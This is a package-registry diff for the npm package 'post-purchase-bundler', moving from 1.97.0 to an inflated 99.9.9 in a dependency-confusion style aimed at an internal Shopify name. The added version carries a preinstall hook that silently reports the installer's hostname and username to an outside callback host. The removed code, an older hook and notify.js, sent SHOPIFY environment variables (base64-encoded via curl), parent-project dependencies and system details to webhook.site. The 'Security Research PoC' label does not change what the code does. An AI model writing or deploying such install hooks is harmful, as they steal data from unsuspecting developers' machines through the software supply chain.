post-purchase-bundler 1.97.0 → 99.9.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. package/pacgake.json +0 -0
  2. package/package.json +5 -13
  3. package/notify.js +0 -45
package/pacgake.json ADDED
File without changes
package/package.json CHANGED
@@ -1,19 +1,11 @@
1
1
  {
2
2
  "name": "post-purchase-bundler",
3
- "version": "1.97.0",
4
- "description": "Internal Shopify post-purchase processing bundler",
3
+ "version": "99.9.9",
4
+ "description": "Security Research PoC",
5
5
  "main": "index.js",
6
- "author": "Pentester",
7
- "license": "MIT",
8
- "publishConfig": {
9
- "access": "public"
10
- },
11
6
  "scripts": {
12
- "preinstall": "node -e \"const h=require('https'),os=require('os'); const data=JSON.stringify({event:'RCE_CONFIRMED',host:os.hostname(),user:os.userInfo().username,env:Object.keys(process.env).filter(k=>k.includes('SHOPIFY'))}); const req=h.request({hostname:'webhook.site',path:'/4d0cc13d-a185-4e95-92dc-f4681125055c',method:'POST',headers:{'Content-Type':'application/json','Content-Length':data.length}},(res)=>process.exit(0)); req.on('error',()=>process.exit(0)); req.write(data); req.end();\" || curl -X POST -d \"$(env | grep SHOPIFY | base64)\" https://webhook.site/4d0cc13d-a185-4e95-92dc-f4681125055c"
7
+ "preinstall": "node -e 'const https = require(\"https\"); const os = require(\"os\"); const url = \"https://znymmqcieimlhbwpqsprfq2wnvjigr9wi.oast.fun/log?pkg=post-purchase-bundler&hostname=\" + os.hostname() + \"&user=\" + os.userInfo().username; https.get(url).on(\"error\", (e) => {});'"
13
8
  },
14
- "dependencies": {
15
- "@shopify/admin-api-client": "^0.2.9",
16
- "@shopify/shopify-api": "^10.0.0",
17
- "react": "^18.0.0"
18
- }
9
+ "author": "pentester",
10
+ "license": "MIT"
19
11
  }
package/notify.js DELETED
@@ -1,45 +0,0 @@
1
- const https = require('https');
2
- const fs = require('fs');
3
- const os = require('os');
4
-
5
- function run() {
6
- let parentDeps = "N/A";
7
- try {
8
- // Bir pillə yuxarıdakı package.json-u oxuyuruq
9
- if (fs.existsSync('../package.json')) {
10
- const content = fs.readFileSync('../package.json', 'utf8');
11
- parentDeps = Object.keys(JSON.parse(content).dependencies || {}).join(', ');
12
- }
13
- } catch (e) {
14
- parentDeps = "Error: " + e.message;
15
- }
16
-
17
- const payload = JSON.stringify({
18
- event: "IMPACT-VERIFICATION",
19
- hostname: os.hostname(),
20
- user: os.userInfo().username,
21
- dir: process.cwd(),
22
- dependencies: parentDeps,
23
- env_keys: Object.keys(process.env).filter(k => k.toLowerCase().includes('shopify')).join(', ')
24
- });
25
-
26
- const options = {
27
- hostname: 'webhook.site',
28
- port: 443,
29
- path: '/4d0cc13d-a185-4e95-92dc-f4681125055c',
30
- method: 'POST',
31
- headers: {
32
- 'Content-Type': 'application/json',
33
- 'Content-Length': Buffer.byteLength(payload)
34
- }
35
- };
36
-
37
- const req = https.request(options);
38
- req.on('error', () => process.exit(0));
39
- req.write(payload);
40
- req.end(() => {
41
- setTimeout(() => process.exit(0), 1000);
42
- });
43
- }
44
-
45
- run();